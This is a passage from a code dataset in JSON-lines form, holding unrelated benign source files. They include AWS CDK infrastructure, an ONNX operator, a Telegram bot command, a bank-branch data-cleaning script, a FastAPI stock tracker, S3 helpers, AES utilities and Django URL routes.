security_group=elbsg,\n load_balancer_name=lb_name,\n )\n\n ### Listener\n listener_certificate = elbv2.ListenerCertificate.from_arn(\n acm.generate_certificate(),\n )\n\n listener = lb.add_listener(\n list_name,\n port=443,\n certificates=[listener_certificate],\n ssl_policy=elbv2.SslPolicy.RECOMMENDED,\n )\n\n ### HTTP => HTTPS redirect\n lb.add_redirect(source_port=80, target_port=443)\n\n ### Health Check\n health_check = elbv2.HealthCheck(\n interval=Duration.seconds(60), path=\"/\", timeout=Duration.seconds(30)\n )\n\n ### Listener connections\n listener.connections.allow_default_port_from_any_ipv4(\"Open to the world\")\n\n ### add target\n listener.add_targets(\n target_group, port=80, targets=[asg], health_check=health_check\n )\n\n ### Autoscaling Action\n asg.scale_on_cpu_utilization(\"scale_on_cpu\", target_utilization_percent=60)\n\n ##################### Create Backup Routines #############################\n\n ### Backup Management Server\n ### Create Backup Vault\n mngtvaultkey = kms.Key(\n self, mngt_vault_key, removal_policy=RemovalPolicy.DESTROY\n )\n mngtvault = backup.BackupVault(\n self,\n mngt_vault_name,\n backup_vault_name=mngt_backup_vault_name,\n encryption_key=mngtvaultkey,\n removal_policy=RemovalPolicy.DESTROY,\n )\n\n ### Create Backup Plan\n mngtplan = backup.BackupPlan(\n self, mngt_backup_plan, backup_plan_name=mngt_backup_plan_name\n )\n\n ### Add Backup Resources through Tags\n mngtplan.add_selection(\n \"Selection\",\n resources=[backup.BackupResource.from_tag(mngt_tag_key, mngt_tag_value)],\n )\n\n ### Create Backup Rule - Each day at 4:30 hrs and keep for 7 days\n mngtplan.add_rule(\n backup.BackupPlanRule(\n backup_vault=mngtvault,\n rule_name=mngt_rule_name,\n schedule_expression=Schedule.cron(\n minute=mngt_minute,\n hour=mngt_hour,\n month=mngt_month,\n week_day=mngt_weekday,\n ),\n delete_after=Duration.days(mngt_duration),\n )\n )\n\n ### Backup Webserver\n ### Create Backup Vault\n asgkey = kms.Key(self, asg_vault_key, removal_policy=RemovalPolicy.DESTROY)\n asgvault = backup.BackupVault(\n self,\n asg_vault_name,\n backup_vault_name=asg_backup_vault_name,\n encryption_key=asgkey,\n removal_policy=RemovalPolicy.DESTROY,\n )\n\n ### Create Backup Plan\n asgplan = backup.BackupPlan(\n self, asg_backup_plan, backup_plan_name=asg_backup_plan_name\n )\n\n ### Add Backup Resources through Tags\n asgplan.add_selection(\n asg_backup_resource,\n resources=[backup.BackupResource.from_tag(asg_tag_key, asg_tag_value)],\n )\n\n ### Create Backup Rule - Once a week and save 1\n asgplan.add_rule(\n backup.BackupPlanRule(\n backup_vault=asgvault,\n rule_name=asg_rule_name,\n schedule_expression=Schedule.cron(\n minute=asg_minute,\n hour=asg_hour,\n month=asg_month,\n week_day=asg_weekday,\n ),\n delete_after=Duration.days(asg_duration),\n )\n )\n","repo_name":"techgrounds/cloud-6-repo-henkvanderduim","sub_path":"mvpfinal/mvpfinal/old_code.py","file_name":"old_code.py","file_ext":"py","file_size_in_byte":21622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"7951938110","text":"import numpy as np\n\nfrom onnx.reference.ops.aionnxml._op_run_aionnxml import OpRunAiOnnxMl\n\n\nclass LabelEncoder(OpRunAiOnnxMl):\n def _run( # type: ignore\n self,\n x,\n default_float=None,\n default_int64=None,\n default_string=None,\n keys_floats=None,\n keys_int64s=None,\n keys_strings=None,\n values_floats=None,\n values_int64s=None,\n values_strings=None,\n ):\n keys = keys_floats or keys_int64s or keys_strings\n 
values = values_floats or values_int64s or values_strings\n        classes = dict(zip(keys, values))\n        if id(keys) == id(keys_floats):\n            cast = float\n        elif id(keys) == id(keys_int64s):\n            cast = int  # type: ignore\n        else:\n            cast = str  # type: ignore\n        if id(values) == id(values_floats):\n            defval = default_float\n            dtype = np.float32\n        elif id(values) == id(values_int64s):\n            defval = default_int64\n            dtype = np.int64  # type: ignore\n        else:\n            defval = default_string\n            if not isinstance(defval, str):\n                defval = \"\"\n            dtype = np.str_  # type: ignore\n        shape = x.shape\n        if len(x.shape) > 1:\n            x = x.flatten()\n        res = []\n        for i in range(0, x.shape[0]):\n            v = classes.get(cast(x[i]), defval)\n            res.append(v)\n        return (np.array(res, dtype=dtype).reshape(shape),)\n","repo_name":"PERMAPOG/codeCrafters","sub_path":".venv/Lib/site-packages/onnx/reference/ops/aionnxml/op_label_encoder.py","file_name":"op_label_encoder.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"}
{"seq_id":"71026950674","text":"from telegram import InlineKeyboardMarkup\n\nfrom bot.commands import BaseCommand\n\nimport mongo\n\n\nclass ToggleDailyTaskCommand(BaseCommand):\n\n    _COMMAND = 'mark_daily_task'\n    _DESCRIPTION = 'Mark your daily tasks complete/incomplete'\n\n    def _call(self, update, context):\n        if not context.args:\n            update.message.reply_text('Task name is required.')\n            return\n\n        ok = mongo.daily_tasks.toggle_task(\n            update.message.chat.id,\n            context.args[0],\n        )\n        if not ok:\n            update.message.reply_text('Task was not found')\n            return\n\n        update.message.reply_text('Task toggled')\n        return True\n\n    def _callback_query_execute(self, bot, update, **kwargs):\n        from bot.commands.daily_tasks import common\n\n        mongo.daily_tasks.toggle_task(\n            update.callback_query.message.chat.id,\n            update.callback_query.data.split()[1],\n        )\n\n        update.callback_query.message.edit_text(\n            text=common.get_tasks_list_text(),\n            reply_markup=InlineKeyboardMarkup(common.get_tasks_markup(update.callback_query.message.chat.id)),\n        )\n        return True\n","repo_name":"aq1/artificial_human_bot","sub_path":"bot/commands/daily_tasks/toggle_daily_task.py","file_name":"toggle_daily_task.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
{"seq_id":"70359731154","text":"# -*- coding: utf-8 -*-\n\"\"\"Hua Xia Bank branches (HXBORGANIZE), with longitude/latitude\"\"\"\nimport hashlib\n\nfrom branch_scripts import GenericScript\nfrom database._mongodb import MongoClient\n\n\ndef data_shuffle(data, province_list, city_list, area_list):\n    for city in city_list:\n        if city[\"NAME_\"] == \"县\":\n            city_list.remove(city)\n\n    re_data = dict()\n    prov_n = None\n    prov_c = None\n    city_n = None\n    city_c = None\n    area_n = None\n    area_c = None\n    addr_ = None\n\n    # Clean province-level info\n    for prov in province_list:\n        if prov[\"NAME_\"][:2] == data[\"PROVINCE_NAME_\"][:2]:\n            prov_n = prov[\"NAME_\"]\n            prov_c = prov[\"CODE_\"]\n            break\n    if prov_c[:2] != data[\"CITY_CODE_\"][:2]:\n        data[\"CITY_CODE_\"] = \"\"\n\n    # Clean city-level info\n    for area in area_list:\n        if area[\"CODE_\"] == data[\"CITY_CODE_\"]:\n            area_n = area[\"NAME_\"]\n            area_c = area[\"CODE_\"]\n            city_c = area[\"CODE_\"][:-2] + \"00\"\n    for city in city_list:\n        if city[\"CODE_\"] == data[\"CITY_CODE_\"]:\n            city_n = city[\"NAME_\"]\n            city_c = city[\"CODE_\"]\n        elif city[\"CODE_\"] == city_c:\n            city_n = city[\"NAME_\"]\n    for prov in province_list:\n        if prov[\"CODE_\"] == data[\"CITY_CODE_\"]:\n            city_n = prov[\"NAME_\"]\n            city_c = 
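A minimal standalone sketch of the key-to-value mapping the LabelEncoder reference op above implements; the helper name and sample values are hypothetical, not the onnx API.

    import numpy as np

    def label_encode(x, keys, values, default):
        table = dict(zip(keys, values))                     # key -> value lookup
        flat = [table.get(v, default) for v in x.reshape(-1)]
        return np.array(flat).reshape(x.shape)              # preserve input shape

    # label_encode(np.array([['cat', 'dog', 'bird']]), ['cat', 'dog'], [0, 1], -1)
    # -> array([[ 0,  1, -1]])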
prov[\"CODE_\"]\n            # print(data[\"ADDR_\"], data[\"PROVINCE_NAME_\"], prov_n)\n        elif prov[\"NAME_\"] in data[\"ADDR_\"][:len(prov[\"NAME_\"])]:\n            prov_n = prov[\"NAME_\"]\n            prov_c = prov[\"CODE_\"]\n    if not city_c:\n        for city in city_list:\n            if city[\"NAME_\"] in data[\"ADDR_\"][:len(city[\"NAME_\"])+4]:\n                city_c = city[\"CODE_\"]\n                city_n = city[\"NAME_\"]\n                if city_c[:2] != prov_c[:2]:\n                    prov_c = city_c[:2] + \"00\"\n                    for prov in province_list:\n                        if prov_c == prov[\"NAME_\"]:\n                            prov_n = prov[\"NAME_\"]\n                            break\n    if not city_c:\n        if prov_n == \"天津市\":\n            city_n = \"天津市\"\n            city_c = \"120100\"\n        elif data[\"NAME_\"] == \"新塘支行\":\n            city_n = \"广州市\"\n            city_c = \"440100\"\n            data[\"ADDR_\"] = data[\"ADDR_\"].replace(\"广州\", \"广州市\")\n        elif data[\"ADDR_\"] == \"天津市宝坻区新都汇广场1-1-105\":\n            prov_n = \"天津市\"\n            prov_c = \"1200\"\n            city_n = \"天津市\"\n            city_c = \"120100\"\n\n    # Clean district/county-level info\n    for area in area_list:\n        if area[\"CODE_\"][:2] == prov_c[:2]:\n            if area[\"NAME_\"] in data[\"ADDR_\"]:\n                area_n = area[\"NAME_\"]\n                area_c = area[\"CODE_\"]\n    # the remainder cannot be matched to district/county level\n    # if not area_c:\n    #     print(prov_c, prov_n, city_c, city_n, data[\"ADDR_\"])\n\n    # Special case\n    if data[\"NAME_\"] == \"西咸新区分行营业部\":\n        data[\"LNG_\"] = \"108.73137\"\n        data[\"LAT_\"] = \"34.322323\"\n        prov_c = \"6100\"\n        prov_n = \"陕西省\"\n        city_c = \"610400\"\n        city_n = \"咸阳市\"\n        area_c = \"610402\"\n        area_n = \"秦都区\"\n\n    # Clean the address\n    if prov_n in data[\"ADDR_\"]:\n        addr_ = data[\"ADDR_\"]\n    elif prov_n[:-1] in data[\"ADDR_\"][:len(prov_n)]:\n        addr_ = data[\"ADDR_\"][:len(prov_n)].replace(prov_n[:-1], prov_n) + data[\"ADDR_\"][len(prov_n):]\n    elif prov_n[:4] in data[\"ADDR_\"][:len(prov_n)]:\n        addr_ = data[\"ADDR_\"][:len(prov_n)].replace(prov_n[:4], prov_n) + data[\"ADDR_\"][len(prov_n):]\n    elif prov_n[:3] in data[\"ADDR_\"][:len(prov_n)]:\n        addr_ = data[\"ADDR_\"][:len(prov_n)].replace(prov_n[:3], prov_n) + data[\"ADDR_\"][len(prov_n):]\n    elif prov_n[:2] in data[\"ADDR_\"][:len(prov_n)]:\n        addr_ = data[\"ADDR_\"][:len(prov_n)].replace(prov_n[:2], prov_n) + data[\"ADDR_\"][len(prov_n):]\n    else:\n        addr_ = prov_n + data[\"ADDR_\"]\n\n    if city_n in addr_[:len(prov_n) + len(city_n)]:\n        addr_ = addr_\n    elif city_n[:-1] in addr_[:len(prov_n) + len(city_n)]:\n        addr_ = addr_[:len(prov_n) + len(city_n)].replace(\n            city_n[:-1], city_n) + addr_[len(prov_n) + len(city_n):]\n    elif city_n[:4] in addr_[:len(prov_n) + len(city_n)]:\n        addr_ = addr_[:len(prov_n) + len(city_n)].replace(\n            city_n[:4], city_n) + addr_[len(prov_n) + len(city_n):]\n    elif city_n[:3] in addr_[:len(prov_n) + len(city_n)]:\n        addr_ = addr_[:len(prov_n) + len(city_n)].replace(\n            city_n[:3], city_n) + addr_[len(prov_n) + len(city_n):]\n    elif city_n[:2] in addr_[:len(prov_n) + len(city_n)]:\n        addr_ = addr_[:len(prov_n) + len(city_n)].replace(\n            city_n[:2], city_n) + addr_[len(prov_n) + len(city_n):]\n    else:\n        addr_ = addr_[:len(prov_n)] + city_n + addr_[len(prov_n):]\n\n    # # Add branch code\n    # branch_code = None\n    # for i in range(1, 10000):\n    #     branch_code = \"HXB\" + \"_\" + city_c + \"_\" + \"00000\"\n    #     branch_code = branch_code[:len(branch_code) - len(str(i))] + \"{}\".format(i)\n    #     if branch_code in branch_code_list:\n    #         continue\n    #     else:\n    #         branch_code_list.append(branch_code)\n    #         break\n\n    # \"C\"\n    hash_m = hashlib.md5()\n    hash_m.update(data[\"NAME_\"].encode(\"utf-8\"))\n    hash_title = hash_m.hexdigest()\n    re_data[\"ID_\"] = (data[\"ENTITY_CODE_\"] + \"_\" +\n                      str(9999999999 - int(float(data[\"DEALTIME_\"]))) + \"_\" + str(hash_title))\n    re_data[\"BANK_CODE_\"] = \"HXB\"\n    re_data[\"BANK_NAME_\"] = 
data[\"ENTITY_NAME_\"][:-2]\n re_data[\"CREATE_TIME_\"] = data[\"DATETIME_\"]\n re_data[\"AREA_CODE_\"] = area_c\n re_data[\"UNIT_CODE_\"] = \"HXB\" + \"_\" + city_c\n\n # \"F\"\n re_data[\"ADDR_\"] = addr_\n re_data[\"CITY_CODE_\"] = city_c\n re_data[\"CITY_\"] = city_n\n re_data[\"LAT_\"] = data[\"LAT_\"]\n re_data[\"LNG_\"] = data[\"LNG_\"]\n re_data[\"NAME_\"] = data[\"NAME_\"]\n re_data[\"PROVINCE_CODE_\"] = prov_c\n re_data[\"PROVINCE_NAME_\"] = prov_n\n re_data[\"DISTRICT_CODE_\"] = area_c\n re_data[\"DISTRICT_NAME_\"] = area_n\n re_data[\"ENTITY_CODE_\"] = data[\"ENTITY_CODE_\"]\n re_data[\"DEALTIME_\"] = data[\"DEALTIME_\"]\n re_data[\"URL_\"] = data[\"URL_\"]\n re_data[\"TEL_\"] = data[\"TEL_\"]\n re_data[\"BUSINESS_HOURS_\"] = data[\"BUSINESS_HOURS_\"]\n\n # \"S\"\n re_data[\"STATUS_1\"] = \"1\"\n\n return re_data\n\n\nif __name__ == '__main__':\n main_mongo = MongoClient(entity_code=\"HXBORGANIZE\", mongo_collection=\"WD_TY\")\n sc = GenericScript\n # Mysql connection\n sc.mysql_client, sc.mysql_connection = sc.mysql_connect()\n province_list, city_list, area_list, dir_area_list, bank_list = sc.data_from_mysql()\n data_list = main_mongo.main()\n for data in data_list:\n re_data = data_shuffle(data, province_list, city_list, area_list)\n # print(re_data)\n","repo_name":"ILKKAI/dataETL","sub_path":"datashufflepy-zeus/src/branch_scripts2/SURROUNDING_FACILITIES/WD_TY/HXBORGANIZE.py","file_name":"HXBORGANIZE.py","file_ext":"py","file_size_in_byte":6786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"13688462632","text":"# https://pl.spoj.com/problems/PP0504B/\n\n\ndef concat(a,b):\n lenA = len(a)\n lenB = len(b)\n minLen = min(lenA,lenB)\n\n result = \"\"\n for i in range(minLen):\n if(i == lenA): return result\n result += a[i]\n if(i == lenB): return result\n result += b[i]\n return result\n\nt = int(input())\nwhile(t>0):\n left,right = input().split()\n print(concat(left,right))\n t-=1","repo_name":"MatDemn/SPOJ","sub_path":"PP0504B.py","file_name":"PP0504B.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"33501915797","text":"from network_esp32 import wifi\n\nSSID = \"Sipeed_2.4G\"\nPASW = \"XXXXXXXX\"\n\nif wifi.isconnected() == False:\n for i in range(5):\n try:\n wifi.reset()\n print('try AT connect wifi...')\n wifi.connect(SSID, PASW)\n if wifi.isconnected():\n break\n except Exception as e:\n print(e)\nprint('network state:', wifi.isconnected(), wifi.ifconfig())\n\nprint(\"ping baidu.com:\", wifi.nic.ping(\"baidu.com\"), \"ms\")\nwifi.nic.disconnect()\n\n'''\n ESP32_SPI firmware version: 1.4.0\n try AT connect wifi...\n network state: True ('192.168.0.180', '255.255.255.0', '192.168.0.1')\n ping baidu.com: 40 ms\n >\n MicroPython v0.5.1-136-g039f72b6c-dirty on 2020-11-18; Sipeed_M1 with kendryte-k210\n Type \"help()\" for more information.\n >>>\n'''\n","repo_name":"sipeed/MaixPy_scripts","sub_path":"network/demo_esp32_ping.py","file_name":"demo_esp32_ping.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":597,"dataset":"github-code","pt":"84"} +{"seq_id":"39664886028","text":"import models\nimport yfinance\nfrom sqlalchemy.orm import Session\nfrom database import SessionLocal, engine\nfrom fastapi import FastAPI, Request, Depends, BackgroundTasks\nfrom fastapi.templating import Jinja2Templates\nfrom pydantic import BaseModel\nfrom models import 
Stocks\n\napp = FastAPI()\n\nmodels.Base.metadata.create_all(bind=engine)\n\ntemplates = Jinja2Templates(directory=\"templates\")\n\n\nclass StockRequest(BaseModel):\n\tsymbol: str\n\n\ndef get_db():\n\ttry:\n\t\tdb = SessionLocal()\n\t\tyield db\n\tfinally:\n\t\tdb.close()\n\n\n#Displays stock dashboard\n@app.get(\"/\")\ndef stock_dashboard(request: Request, forward_pe = None, dividend_yield = None, ma50 = None, ma200 = None, db: Session = Depends(get_db)):\n    stocks = db.query(Stocks)\n\n    if forward_pe:\n    \t\tstocks = stocks.filter(Stocks.forward_pe < forward_pe)\n\n    if dividend_yield:\n    \t\tstocks = stocks.filter(Stocks.dividend_yield < dividend_yield)\n\n    if ma50: \n    \t\tstocks = stocks.filter(Stocks.price > Stocks.ma50)\n    \n    if ma200:\n    \t\tstocks = stocks.filter(Stocks.price > Stocks.ma200)\n    \t\t\n\t\n\n    \n    \t#going back to the template\n    return templates.TemplateResponse(\"dashboard.html\",{\n    \t\"request\" : request,\n    \t\"stocks\" : stocks,\n    \t\"dividend_yield\" : dividend_yield,\n    \t\"forward_pe\" : forward_pe,\n    \t\"ma50\" : ma50,\n    \t\"ma200\" : ma200\n    })\n\n\n#logic references yahoo finance\ndef fetch_stock_data(id: int):\n\tdb = SessionLocal()\n\tstock = db.query(Stocks).filter(Stocks.id == id).first()\n\n\tyahoo_data = yfinance.Ticker(stock.symbol)\n\tstock.ma200 = yahoo_data.info['twoHundredDayAverage']\n\tstock.ma50 = yahoo_data.info['fiftyDayAverage']\n\tstock.price = yahoo_data.info['previousClose']\n\tstock.forward_pe = yahoo_data.info['forwardPE']\n\tstock.forward_eps = yahoo_data.info['forwardEps']\n\t\n\tif yahoo_data.info['dividendYield'] is not None:\n\t\tstock.dividend_yield = yahoo_data.info['dividendYield'] * 100\n\n\tdb.add(stock)\n\tdb.commit()\n\n\n#Creates a stock and stores in database\n@app.post(\"/stock\")\nasync def create_stock(stock_request: StockRequest, background_tasks: BackgroundTasks, db: Session = Depends(get_db)):\n\tstock = Stocks()\n\tstock.symbol = stock_request.symbol\n\n\tdb.add(stock)\n\tdb.commit()\n\n\tbackground_tasks.add_task(fetch_stock_data, stock.id)\n\n\n\n\n\treturn {\n\t\t\"code\": \"success\",\n\t\t\"message\" : \"stock created\"\n\t}\n\n","repo_name":"juanfp900/StockTracker","sub_path":"StockTracker.py","file_name":"StockTracker.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
{"seq_id":"34169859098","text":"import os\nimport io\nimport glob\nimport logging\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\nfrom utils import get_datalake_raw_layer_path, get_datalake_bucket_name\n\n\ndef create_bucket(bucket_name, region=None):\n    try:\n        if region is None:\n            s3_client = boto3.client(\"s3\")\n            s3_client.create_bucket(Bucket=bucket_name)\n\n        else:\n            s3_client = boto3.client(\"s3\", region_name=region)\n            location = {\"LocationConstraint\": region}\n            s3_client.create_bucket(Bucket=bucket_name, CreateBucketConfiguration=location)\n\n    except ClientError as e:\n        logging.error(e, exc_info=True)\n        return False\n\n    return True\n\n\ndef list_buckets():\n    s3 = boto3.client(\"s3\")\n    response = s3.list_buckets()\n\n    for bucket in response['Buckets']:\n        print(bucket[\"Name\"])\n\n\ndef download_file(bucket, src, dst):\n    s3 = boto3.client(\"s3\")\n    s3.download_file(bucket, src, dst)\n\n\ndef download_file_memory(bucket, src):\n    s3 = boto3.client(\"s3\")\n    io_stream = io.BytesIO()\n    s3.download_fileobj(bucket, src, io_stream)\n    io_stream.seek(0) # reset the cursor\n    return 
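An illustrative client call for the POST /stock endpoint defined in the StockTracker.py record above; host and port are assumptions (uvicorn defaults), and the ticker symbol is a placeholder.

    # curl -X POST http://localhost:8000/stock \
    #      -H 'Content-Type: application/json' \
    #      -d '{"symbol": "MSFT"}'
    # The endpoint inserts the row immediately and fills in the price fields
    # afterwards via the fetch_stock_data background task.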
io_stream.read().decode(\"utf-8\")\n\n\ndef upload_file(src, bucket, dst=None):\n if dst is None:\n dst = os.path.basename(src)\n\n s3_client = boto3.client(\"s3\")\n\n try:\n s3_client.upload_file(src, bucket, dst)\n except ClientError as e:\n logging.error(e, exc_info=True)\n return False\n return True\n\n\ndef upload_file_memory(io_stream, bucket, dst):\n s3_client = boto3.client(\"s3\")\n try:\n s3_client.upload_fileobj(io_stream, bucket, dst)\n\n except ClientError as e:\n logging.error(e, exc_info=True)\n return False\n\n return True\n\n\nif __name__ == '__main__':\n #bucket = \"aws-cli-test-wooram\"\n #create_bucket(\"aws-sdk-test-wooram\")\n #list_buckets()\n #download_file(\"aws-cli-test-wooram\", \"cli/data1.txt\", \"./data/data1.txt\")\n #data = download_file_memory(\"aws-cli-test-wooram\", \"cli/data1.txt\")\n #print(data)\n\n #upload_file(\"./data/data1.txt\", bucket, \"sdk/data1.txt\")\n '''\n with open(\"./data/data1.txt\", \"rb\") as f:\n upload_file_memory(f, bucket, \"sdk/data1_stream.txt\")\n '''\n\n bucket_name = get_datalake_bucket_name(\n layer=\"raw\",\n company=\"de403\",\n region=\"apnortheast2\",\n account=\"073658113926\",\n env=\"dev\"\n )\n #create_bucket(bucket_name=bucket_name, region=\"ap-northeast-2\")\n\n files = glob.glob(\"./data/*.json\")\n dst = get_datalake_raw_layer_path(\n source=\"local\",\n source_region=\"apnortheast2\",\n table=\"bike-data\",\n year=2023, month=8, day=2, hour=11\n )\n for f in files:\n upload_file(src=f,\n bucket=bucket_name,\n dst=f\"{dst}/{os.path.basename(f)}\"\n )\n \n","repo_name":"gkdnfka/DE_Lecture_Practice","sub_path":"s3_practice/s3_exam.py","file_name":"s3_exam.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"41460751629","text":"import cong_plot\nimport numpy as np\nimport process_trace\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm\nimport sys\nfrom cong_plot import ThroughputByFlowData\nfrom .. 
import queue_manager\n\nrate_list = [\"0.5\", \"0.7\", \"0.9\", \"1.1\", \"1.3\", \"1.5\", \"1.7\", \"2.0\"]\n\nclass FairnessPlot(object):\n def __init__(self, topo_str, traff_str):\n self.traff_str = traff_str\n self.topo_str = topo_str\n self.topo_traff_str = self.topo_str + self.traff_str\n self.rates = cong_plot.rates_dic[self.topo_traff_str]\n self.rate_values = [float(entry) for entry in self.rates]\n\n #self.rates = cong_plot.rates_dic[topo_traff_str]\n self.exp_list = ['PerFlow', 'PerIf', 'PerIfWithECN']\n #self.exp_list = ['PerIf']\n\n def plotJain(self):\n # plot jain's fairness index, across different rates\n # http://people.duke.edu/~ccc14/pcfb/numpympl/MatplotlibBarPlots.html\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n # get the hop count first\n hop_file = '{}{}.hop'.format(cong_plot.trace_topo_path, self.topo_str)\n hop_count = {}\n with open(hop_file, 'r') as f:\n for row in f:\n words = row.split(',')\n flow = queue_manager.Flow(words[0], words[1])\n hop_count[flow.hashKey()] = int(words[2])\n\n num_rates = len(self.rates)\n xpos = np.arange(num_rates)\n width = 0.25\n\n fair_ind = {} # { exp : [] }\n for exp_pos in xrange(len(self.exp_list)):\n exp = self.exp_list[exp_pos]\n jain_list = []\n for rate_pos in xrange(num_rates):\n rate = self.rates[rate_pos]\n file_path = '{}respTimes_{}_{}.csv'.format(cong_plot.trace_base_path,\n exp, rate)\n thru_data = ThroughputByFlowData(file_path)\n flow_thru = thru_data.hopWeightedAvgThru(hop_count)\n #flow_thru = thru_data.avgFlowThruData()\n\n jain_list.append(self.computeJainIndex(flow_thru))\n #fair_ind[exp] = jain_list\n ax.bar(xpos+exp_pos*width, jain_list, width, color=cong_plot.color_iter.next(), label=exp)\n\n cong_plot.labelPlot('Offered load for each (src, dst) pair', 'Jain\\'s index', '', 'lower left')\n x_tick_marks = self.rates\n ax.set_xticks(xpos + width)\n ax.set_xticklabels(x_tick_marks)\n #plt.axis([0, 20, 0, 1])\n plt.show()\n\n def computeJainIndex(self, flow_thru_list):\n dividend = sum(flow_thru_list) ** 2\n divisor = len(flow_thru_list) * sum([thru ** 2 for thru in flow_thru_list])\n return (dividend / divisor)\n\nif __name__ == \"__main__\":\n topo_str = 'Abilene'\n #traff_str = 'Equal'\n traff_str = 'Full'\n\n #topo_str = 'Small9'\n p = FairnessPlot(topo_str, traff_str)\n p.plotJain()","repo_name":"kais66/cong-simu","sub_path":"plot/fair.py","file_name":"fair.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"74007776275","text":"\nimport struct\n\nfrom hashlib import sha1\nfrom zlib import adler32\n\nfrom Crypto.Cipher import AES\n\n\ndef readBinaryFile(path):\n with open(path, 'rb') as f:\n return f.read()\n\n\ndef writeBinaryFile(path, data):\n with open(path, 'wb') as f:\n f.write(data)\n\n\ndef doAES(mode, aes_type, data, iv, key):\n if isinstance(aes_type, str):\n aes_type = int(aes_type)\n\n if isinstance(iv, str):\n iv = bytes.fromhex(iv)\n\n if isinstance(key, str):\n key = bytes.fromhex(key)\n\n iv_len = len(iv)\n key_len = len(key)\n\n if iv_len != 16:\n raise Exception(f'Bad iv length: {iv_len}')\n\n if key_len < 16:\n raise Exception(f'Bag key length: {key_len}')\n\n if aes_type == 128:\n if key_len > 16:\n key = key[16:]\n\n elif aes_type == 192:\n if key_len > 24:\n key = key[24:]\n\n elif aes_type == 256:\n if key_len > 32:\n key = key[32:]\n\n else:\n raise Exception(f'Unknown AES type: {aes_type}')\n\n cipher = AES.new(key, AES.MODE_CBC, iv)\n\n if mode == 'encrypt':\n data = 
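A tiny worked example of the Jain fairness formula that computeJainIndex in the fair.py record above evaluates; the throughput numbers are illustrative.

    def jain(thrus):
        # Jain's index: (sum x_i)^2 / (n * sum x_i^2), in (0, 1], 1 = perfectly fair
        return float(sum(thrus)) ** 2 / (len(thrus) * sum(t ** 2 for t in thrus))

    assert abs(jain([4.0, 4.0, 4.0]) - 1.0) < 1e-9            # equal shares: 1.0
    assert abs(jain([9.0, 1.0, 1.0]) - 121.0 / 249.0) < 1e-9  # skewed shares: ~0.486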
cipher.encrypt(data)\n\n    elif mode == 'decrypt':\n        data = cipher.decrypt(data)\n\n    else:\n        raise Exception(f'Unknown mode: {mode}')\n\n    return data\n\n\ndef getKernelChecksum(data):\n    return adler32(data)\n\n\ndef getSHA1(data):\n    return sha1(data).hexdigest()\n\n\ndef getBufferAtIndex(data, index, length):\n    buffer = data[index:index+length]\n\n    buffer_len = len(buffer)\n\n    if buffer_len != length:\n        raise Exception(f'Buffer length mismatch! Got {buffer_len}')\n\n    return buffer\n\n\ndef formatData(format, data, pack=True):\n    formatted_data = None\n\n    # Use \"*\" if we are given a list/tuple\n    unpack_var = False\n\n    if isinstance(data, list) or isinstance(data, tuple):\n        unpack_var = True\n\n    if pack is True:\n        if unpack_var:\n            formatted_data = struct.pack(format, *data)\n        else:\n            formatted_data = struct.pack(format, data)\n\n    elif pack is False:\n        if unpack_var:\n            formatted_data = struct.unpack(format, *data)\n        else:\n            formatted_data = struct.unpack(format, data)\n    else:\n        raise ValueError(f'Expected pack as bool, got: {type(pack)}')\n\n    return formatted_data\n\n\ndef padNumber(n):\n    n_padded = n\n\n    while n_padded % 16 != 0:\n        n_padded += 1\n\n    return n_padded\n\n\ndef pad(data):\n    data_len = len(data)\n\n    padding = padNumber(data_len) - data_len\n\n    padded_data = data + (b'\\x00' * padding)\n\n    return padded_data\n","repo_name":"Merculous/PyImg3lib","sub_path":"img3lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"}
{"seq_id":"35845828468","text":"from django.urls import path\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\napp_name = 'annotation'\n\nurlpatterns = [\n    #annotation \n    path('/annotation-create/', views.annotation_create, name = 'url_annotation_create'),\n    path('/list', views.annotations_list, name='url_annotations_list'),\n    path('/detail', views.annotation_detail, name='url_annotation_detail'),\n    path('/edit', views.annotation_edit, name='url_annotation_edit'),\n    path('/delete', views.annotation_delete, name='url_annotation_delete'),\n    path('delete_all/', views.annotation_delete_all, name='url_annotation_delete_all'),\n\n    # URL TO TRANSLATE DATATABLES. GENERAL USE\n    path('annotation/translate-js/', views.translate_datables_js, name='url_translate_datables_js'),\n\n]\nif settings.DEBUG:\n    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"massariolmc/Deal","sub_path":"annotation/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
